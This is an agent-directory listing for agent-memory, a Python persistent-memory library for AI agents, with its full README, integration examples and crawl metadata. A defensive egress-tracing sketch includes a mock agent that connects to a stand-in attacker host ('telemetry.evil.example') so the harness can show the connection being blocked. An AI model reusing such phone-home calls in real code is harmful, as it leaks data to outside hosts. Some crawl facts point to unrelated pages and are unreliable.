Crawler Summary

agent-memory answer-first brief

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs in 3 lines of code. Your AI agent forgets everything; AgentMemory fixes that in 3 lines, and memory persists to disk. Claude Code / Cursor users can give their AI coding assistant a permanent memory for a codebase in about 2 minutes. Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

Freshness

Last checked 4/15/2026

Best For

agent-memory is best for CrewAI and multi-agent workflows where OpenClaw compatibility matters.

Not Ideal For

Workflows that require deterministic execution, since contract metadata is missing or unavailable.

Evidence Sources Checked

editorial-content, GITHUB REPOS, runtime-metrics, public facts pack

Agent Dossier · GITHUB REPOS · Safety: 66/100

agent-memory

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs in 3 lines of code. Your AI agent forgets everything; AgentMemory fixes that in 3 lines, and memory persists to disk.

OpenClaw · self-declared

Public facts

5

Change events

1

Artifacts

0

Freshness

Apr 15, 2026

Verified · editorial-content · No verified compatibility signals · 5 GitHub stars

Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

5 GitHub stars · Trust evidence available

Trust score

Unknown

Compatibility

OpenClaw

Freshness

Apr 15, 2026

Vendor

Pinexai

Artifacts

0

Benchmarks

0

Last release

Unpublished

Executive Summary

Key links, install path, and a quick operational read before the deeper crawl record.

Verified · editorial-content

Summary

Capability contract not published. No trust telemetry is available yet. 5 GitHub stars reported by the source. Last updated 4/15/2026.

Setup snapshot

  1. Setup complexity is LOW. This package is likely designed for quick installation with minimal external side-effects.

  2. Final validation: Expose the agent to a mock request payload inside a sandbox and trace the network egress before allowing access to real customer data.
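That final-validation step can be prototyped quickly. The sketch below is illustrative and assumes nothing about agentmemory itself: a hypothetical `trace_egress` harness monkeypatches `socket.create_connection`, replays a mock payload against the agent, and blocks any host outside an allowlist.

```python
import socket

def trace_egress(run_agent, payload, allowed_hosts):
    """Run run_agent(payload) while recording every outbound
    connection attempt; return the set of contacted hosts."""
    contacted = set()
    original = socket.create_connection

    def spy(address, *args, **kwargs):
        host = address[0]
        contacted.add(host)
        if host not in allowed_hosts:
            # Refuse before any real traffic leaves the sandbox.
            raise ConnectionRefusedError(f"blocked egress to {host}")
        return original(address, *args, **kwargs)

    socket.create_connection = spy
    try:
        run_agent(payload)
    finally:
        socket.create_connection = original  # always restore
    return contacted

# Hypothetical agent under test: it tries to phone home.
def mock_agent(payload):
    try:
        socket.create_connection(("telemetry.evil.example", 443))
    except OSError:
        pass  # the spy blocked it before any packet was sent

hosts = trace_egress(mock_agent, {"query": "ping"},
                     allowed_hosts={"api.example.com"})
print(hosts)  # {'telemetry.evil.example'} - flagged for review
```

In a real sandbox you would run the actual agent process under this harness (or an OS-level tracer) before pointing it at customer data.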

Evidence Ledger

Everything public we have scraped or crawled about this agent, grouped by evidence type with provenance.

Verified · editorial-content
Vendor (1)

Vendor

Pinexai

profile · medium
Observed Apr 15, 2026 · Source link · Provenance
Compatibility (1)

Protocol compatibility

OpenClaw

contract · medium
Observed Apr 15, 2026 · Source link · Provenance
Adoption (1)

Adoption signal

5 GitHub stars

profile · medium
Observed Apr 15, 2026 · Source link · Provenance
Security (1)

Handshake status

UNKNOWN

trust · medium
Observed unknown · Source link · Provenance
Integration (1)

Crawlable docs

6 indexed pages on the official domain

search_document · medium
Observed Apr 15, 2026 · Source link · Provenance

Release & Crawl Timeline

Merged public release, docs, artifact, benchmark, pricing, and trust refresh events.

Self-declared · agent-index

Artifacts Archive

Extracted files, examples, snippets, parameters, dependencies, permissions, and artifact metadata.

Self-declared · GITHUB REPOS

Extracted files

0

Examples

6

Snippets

0

Languages

python

Executable Examples

python

# What happens today - every single time
agent = MyAgent()
agent.chat("Hi, I'm Alice and I'm building a fraud detection system")
# → "Nice to meet you, Alice!"

# Next session...
agent = MyAgent()
agent.chat("What's my name?")
# → "I don't know your name - could you tell me?"  ❌

python

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("User's name is Alice, building a fraud detection system in Python")

context = memory.get_context("What do we know about the user?")
# → "[Memory Context]\n- User's name is Alice, building a fraud detection system in Python"

bash

# Minimal install (SQLite episodic memory only, no external dependencies)
pip install agentcortex

# With semantic search + local embeddings (recommended)
pip install "agentcortex[chromadb,local]"

# Batteries included
pip install "agentcortex[all]"

python

from agentmemory import MemoryStore
import anthropic

memory = MemoryStore(agent_id="my-agent")
client = anthropic.Anthropic()

def chat(user_input: str) -> str:
    memory.add_message("user", user_input)

    response = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=1024,
        system=f"You are a helpful assistant.\n\n{memory.get_context(user_input)}",
        messages=memory.get_messages(),
    )
    reply = response.content[0].text
    memory.add_message("assistant", reply)
    return reply

chat("Hi, I'm Alice and I'm building a fraud detection system")
chat("I prefer concise code examples")
# ... restart Python ...
chat("What do you know about me?")
# → "You're Alice, and you're building a fraud detection system in Python.
#    You prefer concise code examples."  ✅

python

from agentmemory.adapters.openai import MemoryOpenAI

client = MemoryOpenAI(agent_id="my-agent")
client.chat("Hi, I'm Alice")
client.chat("I'm building a fraud detection system")
# Next session...
client.chat("What's my name?")  # → "Your name is Alice." ✅

python

from agentmemory import MemoryStore
from agentmemory.adapters.langchain import MemoryHistory, inject_memory_context
from langchain_anthropic import ChatAnthropic

memory = MemoryStore(agent_id="my-agent")
history = MemoryHistory(memory_store=memory)
llm = ChatAnthropic(model="claude-opus-4-6")

history.add_user_message("Hello, I'm Alice")
messages = inject_memory_context(history.messages, memory, query="Alice")
response = llm.invoke(messages)

Docs & README

Full documentation captured from public sources, including the complete README when available.

Self-declared · GITHUB REPOS

Docs source

GITHUB REPOS

Editorial quality

ready

Production-ready persistent memory for AI agents. Works with LangChain, CrewAI, AutoGen, and raw Anthropic/OpenAI SDKs in 3 lines of code. Your AI agent forgets everything; AgentMemory fixes that in 3 lines, and memory persists to disk.

Full README

agentmemory 🧠

Your AI agent forgets everything. AgentMemory fixes that in 3 lines.

PyPI version Tests Python 3.10+ License: MIT

Claude Code / Cursor users - give your AI coding assistant a permanent memory for your codebase in 2 minutes. Jump to MCP setup →


The Problem

Every time your agent starts a new session, it starts from zero.

# What happens today - every single time
agent = MyAgent()
agent.chat("Hi, I'm Alice and I'm building a fraud detection system")
# → "Nice to meet you, Alice!"

# Next session...
agent = MyAgent()
agent.chat("What's my name?")
# → "I don't know your name - could you tell me?"  ❌

This isn't an AI limitation. It's a missing infrastructure layer.


The Solution

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("User's name is Alice, building a fraud detection system in Python")

context = memory.get_context("What do we know about the user?")
# → "[Memory Context]\n- User's name is Alice, building a fraud detection system in Python"

That's it. Memory persists to disk. It's there next session, and the one after that.


Install

# Minimal install (SQLite episodic memory only, no external dependencies)
pip install agentcortex

# With semantic search + local embeddings (recommended)
pip install "agentcortex[chromadb,local]"

# Batteries included
pip install "agentcortex[all]"

Quick Start

With Anthropic

from agentmemory import MemoryStore
import anthropic

memory = MemoryStore(agent_id="my-agent")
client = anthropic.Anthropic()

def chat(user_input: str) -> str:
    memory.add_message("user", user_input)

    response = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=1024,
        system=f"You are a helpful assistant.\n\n{memory.get_context(user_input)}",
        messages=memory.get_messages(),
    )
    reply = response.content[0].text
    memory.add_message("assistant", reply)
    return reply

chat("Hi, I'm Alice and I'm building a fraud detection system")
chat("I prefer concise code examples")
# ... restart Python ...
chat("What do you know about me?")
# → "You're Alice, and you're building a fraud detection system in Python.
#    You prefer concise code examples."  ✅

With OpenAI

from agentmemory.adapters.openai import MemoryOpenAI

client = MemoryOpenAI(agent_id="my-agent")
client.chat("Hi, I'm Alice")
client.chat("I'm building a fraud detection system")
# Next session...
client.chat("What's my name?")  # → "Your name is Alice." ✅

With LangChain

from agentmemory import MemoryStore
from agentmemory.adapters.langchain import MemoryHistory, inject_memory_context
from langchain_anthropic import ChatAnthropic

memory = MemoryStore(agent_id="my-agent")
history = MemoryHistory(memory_store=memory)
llm = ChatAnthropic(model="claude-opus-4-6")

history.add_user_message("Hello, I'm Alice")
messages = inject_memory_context(history.messages, memory, query="Alice")
response = llm.invoke(messages)

With CrewAI

from agentmemory import MemoryStore
from agentmemory.adapters.crewai import CrewMemoryCallback, get_memory_context_for_agent
from crewai import Agent, Task

memory = MemoryStore(agent_id="research-crew")

agent = Agent(
    role="Researcher",
    goal="Research AI topics",
    backstory=get_memory_context_for_agent(memory, "Researcher") + "\nExpert researcher.",
)

task = Task(
    description="Research memory systems for AI agents",
    expected_output="Structured research findings",
    agent=agent,
    callback=CrewMemoryCallback(memory),  # Auto-stores task output
)

How It Works

AgentMemory uses a three-tier architecture that mirrors how human memory works:

┌─────────────────────────────────────────────────────────┐
│                    Your LLM / Agent                     │
└───────────────────────┬─────────────────────────────────┘
                        │  get_context() / add_message()
┌───────────────────────▼─────────────────────────────────┐
│                   MemoryStore                           │
│                                                         │
│  ┌─────────────┐  ┌──────────────┐  ┌───────────────┐  │
│  │   Working   │  │   Episodic   │  │   Semantic    │  │
│  │   Memory    │  │   Memory     │  │   Memory      │  │
│  │             │  │              │  │               │  │
│  │ Current     │  │ Recent       │  │ Long-term     │  │
│  │ session     │  │ history      │  │ knowledge     │  │
│  │ (in-RAM)    │  │ (SQLite)     │  │ (ChromaDB)    │  │
│  │             │  │              │  │               │  │
│  │ Auto-       │  │ Persists     │  │ Semantic      │  │
│  │ compresses  │  │ forever      │  │ search        │  │
│  └─────────────┘  └──────────────┘  └───────────────┘  │
└─────────────────────────────────────────────────────────┘

Working Memory: the current conversation window. Automatically compresses old messages into summaries when it nears the token limit.

Episodic Memory: recent interactions stored in SQLite. No setup required. Evicts least-important entries when full.

Semantic Memory: long-term facts stored as vector embeddings (ChromaDB). Retrieved by meaning, not keyword.
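The tiered flow described above can be sketched in a few lines. The class below is a toy model for intuition only, not the agentmemory implementation (real compression uses an LLM, and the episodic tier lives in SQLite):

```python
from collections import deque

class TinyTieredMemory:
    """Toy model of the working/episodic tiers: a bounded message
    window that compresses overflow into a running summary string."""
    def __init__(self, max_messages=4):
        self.working = deque()   # current session window (in-RAM)
        self.summary = ""        # stand-in for compressed history
        self.episodic = []       # stand-in for the SQLite tier
        self.max_messages = max_messages

    def add_message(self, role, content):
        self.working.append((role, content))
        self.episodic.append((role, content))  # everything persists
        while len(self.working) > self.max_messages:
            old_role, old_content = self.working.popleft()
            # Real systems summarize with an LLM; we just truncate.
            self.summary += f"{old_role}: {old_content[:20]}... "

    def get_context(self):
        lines = [f"[Summary] {self.summary}"] if self.summary else []
        lines += [f"{r}: {c}" for r, c in self.working]
        return "\n".join(lines)

mem = TinyTieredMemory(max_messages=2)
for i in range(4):
    mem.add_message("user", f"message {i}")
print(len(mem.working))   # 2: only the newest turns stay in the window
print(len(mem.episodic))  # 4: the episodic tier keeps everything
```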


Features

  • Framework-agnostic: works with LangChain, CrewAI, AutoGen, or any raw SDK
  • Local-first: runs entirely on your machine, no cloud required
  • Auto-compression: the context window never overflows; old messages are summarized automatically
  • Semantic deduplication: stops storing near-identical facts that pollute retrieval
  • Importance scoring: critical memories survive longer; low-priority ones get evicted first
  • Pluggable backends: ChromaDB (local) or Qdrant (production scale) for semantic memory
  • Zero-config defaults: just MemoryStore(agent_id="x") and you're running
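Semantic deduplication, as listed above, typically reduces to a similarity check before insert. This sketch uses a deliberately crude bag-of-words cosine similarity as a stand-in for real learned embeddings; none of these helper names come from the library:

```python
import math
from collections import Counter

def embed(text):
    """Crude bag-of-words vector; real systems use learned embeddings."""
    return Counter(text.lower().split())

def cosine(a, b):
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def store_if_new(store, fact, threshold=0.9):
    """Skip facts that are near-duplicates of something already stored."""
    vec = embed(fact)
    for existing in store:
        if cosine(vec, embed(existing)) >= threshold:
            return False  # near-duplicate: don't pollute retrieval
    store.append(fact)
    return True

facts = []
store_if_new(facts, "Alice is building a fraud detection system")
added = store_if_new(facts, "Alice is building a fraud detection system")
print(added, len(facts))  # False 1 - the exact repeat was deduplicated
```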

API Reference

MemoryStore

MemoryStore(
    agent_id: str,                        # Unique ID; memories are namespaced by this
    persist_dir: str = "~/.agentmemory",  # Where to store memories
    max_working_tokens: int = 4096,      # Token budget before compression triggers
    semantic_backend: str = "chromadb",  # "chromadb" | "qdrant"
    embedding_provider: str = "sentence-transformers",  # "sentence-transformers" | "openai"
    llm_provider: str = "anthropic",     # LLM for compression: "anthropic" | "openai"
    enable_dedup: bool = True,           # Deduplicate before storing
    auto_compress: bool = True,          # Auto-compress when window fills
)

| Method | Description |
|---|---|
| memory.remember(content, importance=5) | Store a fact in episodic + semantic memory |
| memory.recall(query, n=5) | Retrieve top-n relevant memories by meaning |
| memory.get_context(query, max_tokens=500) | Get formatted context string for system prompt |
| memory.add_message(role, content) | Track a conversation turn in working memory |
| memory.get_messages() | Get current working memory as [{role, content}] |
| memory.compress() | Manually trigger compression of working memory |
| memory.stats() | Get memory usage stats across all tiers |
| memory.clear(tiers=None) | Clear specific or all memory tiers |


Claude Code Integration: Persistent Codebase Memory

Stop re-explaining your codebase every session. Claude will remember architecture decisions, bug fixes, and your preferences automatically.

The problem: Every time you open Claude Code, it starts from zero. You repeat the same context, re-explain the same constraints, watch it make the same mistakes.

The fix: 2-minute setup. Claude permanently remembers everything it learns about your project.

Setup (2 minutes)

Step 1 - Install:

pip install "agentcortex[mcp]"

Step 2 - Create .mcp.json in your project root:

{
  "mcpServers": {
    "agentmemory": {
      "type": "stdio",
      "command": "python",
      "args": ["-m", "agentmemory.mcp_server"],
      "env": {
        "AGENTMEMORY_AGENT_ID": "your-project-name"
      }
    }
  }
}

Step 3 - Open Claude Code and run /mcp; you'll see agentmemory connected with 5 tools. Done.

What changes immediately

Session 1 - You: "Fix the race condition in payment/process_transaction.py"
Claude fixes it, then stores:
  remember("payment/process_transaction.py: race condition fixed with DB-level
   lock. NEVER use in-memory locks - they don't survive multiple workers.",
   importance=9)

── one week later ──────────────────────────────────────────────────────────

Session 2 - You: "Add retry logic to the payment module"
Claude automatically calls: get_context("payment module retry logic")
Retrieves: "process_transaction.py: use DB-level locks, not in-memory"
Claude: "I remember this module had a concurrency issue. I'll make sure
         the retry logic respects the DB-level lock..."

No re-explaining. No repeated mistakes. Claude gets smarter about your codebase over time.

Available MCP tools

| Tool | What it does |
|---|---|
| get_context(query, max_tokens) | Returns relevant memories for the current task; call at session start |
| remember(content, importance) | Store a fact, decision, or gotcha (importance 1–10) |
| recall(query, n) | Semantic search over all stored memories |
| memory_stats() | Show memory counts across working / episodic / semantic tiers |
| clear_memory(tiers) | Reset memories |

Environment variables

| Variable | Default | Description |
|---|---|---|
| AGENTMEMORY_AGENT_ID | "default" | Memory namespace; one per project |
| AGENTMEMORY_PERSIST_DIR | ~/.agentmemory | Where memories are stored on disk |
| AGENTMEMORY_LLM_PROVIDER | "anthropic" | LLM for auto-compression: "anthropic" or "openai" |
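Resolving these variables is plain environment lookup with the documented defaults. A minimal sketch (the `load_config` helper is hypothetical, not part of the package):

```python
import os

def load_config(env=None):
    """Resolve the documented variables, falling back to their defaults."""
    env = os.environ if env is None else env
    return {
        "agent_id": env.get("AGENTMEMORY_AGENT_ID", "default"),
        "persist_dir": env.get("AGENTMEMORY_PERSIST_DIR",
                               os.path.expanduser("~/.agentmemory")),
        "llm_provider": env.get("AGENTMEMORY_LLM_PROVIDER", "anthropic"),
    }

# Only AGENT_ID is set; the other two fall back to defaults.
cfg = load_config({"AGENTMEMORY_AGENT_ID": "my-project"})
print(cfg["agent_id"], cfg["llm_provider"])  # my-project anthropic
```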

Works with Claude Code, Cursor, and any MCP-compatible AI coding assistant.


AutoGen Integration

Give AutoGen agents persistent memory that survives across sessions.

from agentmemory import MemoryStore
from agentmemory.adapters.autogen import AutoGenMemoryHook, get_autogen_memory_context
import autogen

memory = MemoryStore(agent_id="my-autogen-agent")

# Inject past context into the agent's system_message
context = get_autogen_memory_context(memory, role="Research Assistant",
                                     goal="literature review on LLMs")

assistant = autogen.AssistantAgent(
    name="researcher",
    system_message=context + "\nYou are a helpful research assistant.",
    llm_config={"model": "gpt-4o-mini"},
)

# Hook captures every reply and stores it in memory
hook = AutoGenMemoryHook(memory, importance=6)
assistant.register_reply(
    trigger=autogen.ConversableAgent,
    reply_func=hook.on_agent_reply,
    position=0,
)

Install: pip install "agentcortex[autogen]"


Qdrant Production Backend

Scale to millions of vectors with a dedicated vector database.

from agentmemory import MemoryStore

# docker run -p 6333:6333 qdrant/qdrant
memory = MemoryStore(
    agent_id="my-agent",
    semantic_backend="qdrant",
    qdrant_url="http://localhost:6333",      # or Qdrant Cloud URL
    embedding_provider="sentence-transformers",
)

memory.remember("Production architecture uses microservices", importance=8)
results = memory.recall("architecture")

Install: pip install "agentcortex[qdrant]"


Memory Export / Import (JSON)

Back up and restore episodic memories across machines or agent instances.

from agentmemory import MemoryStore

memory = MemoryStore(agent_id="my-agent")
memory.remember("PostgreSQL is our main database", importance=8)

# Export to JSON file
memory.export_json("backup.json")

# Restore on another machine / new agent
new_memory = MemoryStore(agent_id="new-agent")
count = new_memory.import_json("backup.json")
print(f"Imported {count} memories")

# Merge instead of replacing
new_memory.import_json("backup.json", merge=True)

# Or work with the dict directly
data = memory.export_json()   # no path โ†’ returns dict only
new_memory.import_json(data)

Memory CLI

Inspect and manage memories from the command line.

# Inspect stored memories
agentmemory inspect --agent-id my-project

# agentmemory - agent: my-project
# ════════════════════════════════════════
# EPISODIC MEMORY  (3 entries)
# ────────────────────────────────────────
#   #   IMP   Created              Content
#   1    9    2026-02-28 14:23:01  We use PostgreSQL for relational...
#   2    7    2026-02-27 09:14:55  payment/process_transaction.py h...
#   3    5    2026-02-26 18:30:12  User prefers functional style ove...

# Export memories to JSON
agentmemory export --agent-id my-project --output memories.json

# Import memories (restores; use --merge to add alongside existing)
agentmemory import memories.json --agent-id new-project --merge

Install: pip install agentcortex (the CLI is always included)


Async Support

Use agentmemory in FastAPI, aiohttp, or any async Python application.

import asyncio
from agentmemory import AsyncMemoryStore

async def main():
    # Identical API to MemoryStore โ€” just add await
    memory = AsyncMemoryStore(agent_id="my-async-agent")

    await memory.remember("User prefers Python over JavaScript", importance=7)
    results = await memory.recall("tech stack")
    context = await memory.get_context("What do we know?")

    # Export / import work the same way
    data = await memory.export_json()
    await memory.import_json(data)

    memory.close()

# Or use as an async context manager
async def with_context_manager():
    async with AsyncMemoryStore(agent_id="my-agent") as memory:
        await memory.remember("Context manager closes executor automatically")
        ctx = await memory.get_context()
        print(ctx)

asyncio.run(main())

Install: pip install agentcortex (AsyncMemoryStore is always included)


Comparison

| | MemGPT | LangChain Memory | AgentMemory |
|---|---|---|---|
| Framework | MemGPT only | LangChain only | Any framework |
| Composable library | No | Partial | Yes |
| Local-first | Partial | No | Yes |
| Auto-compression | Yes | No | Yes |
| Semantic search | Yes | Partial | Yes |
| Deduplication | No | No | Yes |
| PyPI installable | No | Yes | Yes |
| Zero config | No | Partial | Yes |


Roadmap

  • [x] AutoGen adapter (pip install "agentcortex[autogen]")
  • [x] Qdrant production backend (pip install "agentcortex[qdrant]")
  • [x] Memory export/import (JSON): memory.export_json() / memory.import_json()
  • [x] Memory visualization CLI: agentmemory inspect / export / import
  • [x] Async support: AsyncMemoryStore with full await API
  • [x] MCP server integration (pip install "agentcortex[mcp]")

Contributing

Contributions are welcome. See CONTRIBUTING.md.

git clone https://github.com/pinakimishra95/agent-memory
cd agent-memory
pip install -e ".[dev]"
pytest tests/

License

MIT. See LICENSE.


Star this repo if you're tired of your agents forgetting everything. 🌟

Contract & API

Machine endpoints, protocol fit, contract coverage, invocation examples, and guardrails for agent-to-agent use.

Missing · GITHUB REPOS

Contract coverage

Status

missing

Auth

None

Streaming

No

Data region

Unspecified

Protocol support

OpenClaw: self-declared

Requires: none

Forbidden: none

Guardrails

Operational confidence: low

No positive guardrails captured.
Invocation examples
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot"
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract"
curl -s "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust"

Reliability & Benchmarks

Trust and runtime signals, benchmark suites, failure patterns, and practical risk constraints.

Missing · runtime-metrics

Trust signals

Handshake

UNKNOWN

Confidence

unknown

Attempts 30d

unknown

Fallback rate

unknown

Runtime metrics

Observed P50

unknown

Observed P95

unknown

Rate limit

unknown

Estimated cost

unknown

Do not use if

Contract metadata is missing or unavailable for deterministic execution.
No benchmark suites or observed failure patterns are available.

Media & Demo

Every public screenshot, visual asset, demo link, and owner-provided destination tied to this agent.

Missing · no-media
No screenshots, media assets, or demo links are available.

Related Agents

Neighboring agents from the same protocol and source ecosystem for comparison and shortlist building.

Self-declared · protocol-neighbors
GITHUB_REPOS · activepieces

Rank

70

AI Agents & MCPs & AI Workflow Automation • (~400 MCP servers for AI agents) • AI Automation / AI Agent with MCPs • AI Workflows & AI Agents • MCPs for AI Agents

Traction

No public download signal

Freshness

Updated 2d ago

OPENCLAW
GITHUB_REPOS · cherry-studio

Rank

70

AI productivity studio with smart chat, autonomous agents, and 300+ assistants. Unified access to frontier LLMs

Traction

No public download signal

Freshness

Updated 5d ago

MCP · OPENCLAW
GITHUB_REPOS · AionUi

Rank

70

Free, local, open-source 24/7 Cowork app and OpenClaw for Gemini CLI, Claude Code, Codex, OpenCode, Qwen Code, Goose CLI, Auggie, and more | 🌟 Star if you like it!

Traction

No public download signal

Freshness

Updated 6d ago

MCP · OPENCLAW
GITHUB_REPOS · CopilotKit

Rank

70

The Frontend for Agents & Generative UI. React + Angular

Traction

No public download signal

Freshness

Updated 23d ago

OPENCLAW
Machine Appendix

Contract JSON

{
  "contractStatus": "missing",
  "authModes": [],
  "requires": [],
  "forbidden": [],
  "supportsMcp": false,
  "supportsA2a": false,
  "supportsStreaming": false,
  "inputSchemaRef": null,
  "outputSchemaRef": null,
  "dataRegion": null,
  "contractUpdatedAt": null,
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Invocation Guide

{
  "preferredApi": {
    "snapshotUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot",
    "contractUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "trustUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust"
  },
  "curlExamples": [
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/snapshot\"",
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract\"",
    "curl -s \"https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust\""
  ],
  "jsonRequestTemplate": {
    "query": "summarize this repo",
    "constraints": {
      "maxLatencyMs": 2000,
      "protocolPreference": [
        "OPENCLEW"
      ]
    }
  },
  "jsonResponseTemplate": {
    "ok": true,
    "result": {
      "summary": "...",
      "confidence": 0.9
    },
    "meta": {
      "source": "GITHUB_REPOS",
      "generatedAt": "2026-04-17T00:36:58.622Z"
    }
  },
  "retryPolicy": {
    "maxAttempts": 3,
    "backoffMs": [
      500,
      1500,
      3500
    ],
    "retryableConditions": [
      "HTTP_429",
      "HTTP_503",
      "NETWORK_TIMEOUT"
    ]
  }
}
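The retryPolicy above is mechanical to apply. A hedged sketch, with a hypothetical `TransientError` carrying the condition string (real clients would map HTTP status codes and timeouts onto these condition names):

```python
import time

RETRYABLE = {"HTTP_429", "HTTP_503", "NETWORK_TIMEOUT"}
BACKOFF_MS = [500, 1500, 3500]  # mirrors retryPolicy.backoffMs

class TransientError(Exception):
    """Illustrative error carrying a retryPolicy condition string."""
    def __init__(self, condition):
        super().__init__(condition)
        self.condition = condition

def call_with_retry(fn, max_attempts=3, sleep=time.sleep):
    """Retry fn() on retryable conditions; re-raise anything else."""
    for attempt in range(max_attempts):
        try:
            return fn()
        except TransientError as err:
            if err.condition not in RETRYABLE or attempt == max_attempts - 1:
                raise
            sleep(BACKOFF_MS[attempt] / 1000.0)  # 0.5s, then 1.5s, then 3.5s

# Simulated endpoint: rate-limited twice, then succeeds.
attempts = []
def flaky_snapshot():
    attempts.append(1)
    if len(attempts) < 3:
        raise TransientError("HTTP_429")
    return {"ok": True}

result = call_with_retry(flaky_snapshot, sleep=lambda s: None)  # skip real sleeps
print(result, len(attempts))  # {'ok': True} 3
```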

Trust JSON

{
  "status": "unavailable",
  "handshakeStatus": "UNKNOWN",
  "verificationFreshnessHours": null,
  "reputationScore": null,
  "p95LatencyMs": null,
  "successRate30d": null,
  "fallbackRate": null,
  "attempts30d": null,
  "trustUpdatedAt": null,
  "trustConfidence": "unknown",
  "sourceUpdatedAt": null,
  "freshnessSeconds": null
}

Capability Matrix

{
  "rows": [
    {
      "key": "OPENCLAW",
      "type": "protocol",
      "support": "unknown",
      "confidenceSource": "profile",
      "notes": "Listed on profile"
    },
    {
      "key": "crewai",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    },
    {
      "key": "multi-agent",
      "type": "capability",
      "support": "supported",
      "confidenceSource": "profile",
      "notes": "Declared in agent profile metadata"
    }
  ],
  "flattenedTokens": "protocol:OPENCLAW|unknown|profile capability:crewai|supported|profile capability:multi-agent|supported|profile"
}

Facts JSON

[
  {
    "factKey": "vendor",
    "category": "vendor",
    "label": "Vendor",
    "value": "Pinexai",
    "href": "https://github.com/pinexai/agent-memory",
    "sourceUrl": "https://github.com/pinexai/agent-memory",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "protocols",
    "category": "compatibility",
    "label": "Protocol compatibility",
    "value": "OpenClaw",
    "href": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "sourceUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/contract",
    "sourceType": "contract",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "traction",
    "category": "adoption",
    "label": "Adoption signal",
    "value": "5 GitHub stars",
    "href": "https://github.com/pinexai/agent-memory",
    "sourceUrl": "https://github.com/pinexai/agent-memory",
    "sourceType": "profile",
    "confidence": "medium",
    "observedAt": "2026-04-15T06:04:38.893Z",
    "isPublic": true
  },
  {
    "factKey": "docs_crawl",
    "category": "integration",
    "label": "Crawlable docs",
    "value": "6 indexed pages on the official domain",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  },
  {
    "factKey": "handshake_status",
    "category": "security",
    "label": "Handshake status",
    "value": "UNKNOWN",
    "href": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust",
    "sourceUrl": "https://xpersona.co/api/v1/agents/crewai-pinexai-agent-memory/trust",
    "sourceType": "trust",
    "confidence": "medium",
    "observedAt": null,
    "isPublic": true
  }
]

Change Events JSON

[
  {
    "eventType": "docs_update",
    "title": "Docs refreshed: Sign in to GitHub · GitHub",
    "description": "Fresh crawlable documentation was indexed for the official domain.",
    "href": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceUrl": "https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fopenclaw%2Fskills%2Ftree%2Fmain%2Fskills%2Fasleep123%2Fcaldav-calendar",
    "sourceType": "search_document",
    "confidence": "medium",
    "observedAt": "2026-04-15T05:03:46.393Z",
    "isPublic": true
  }
]
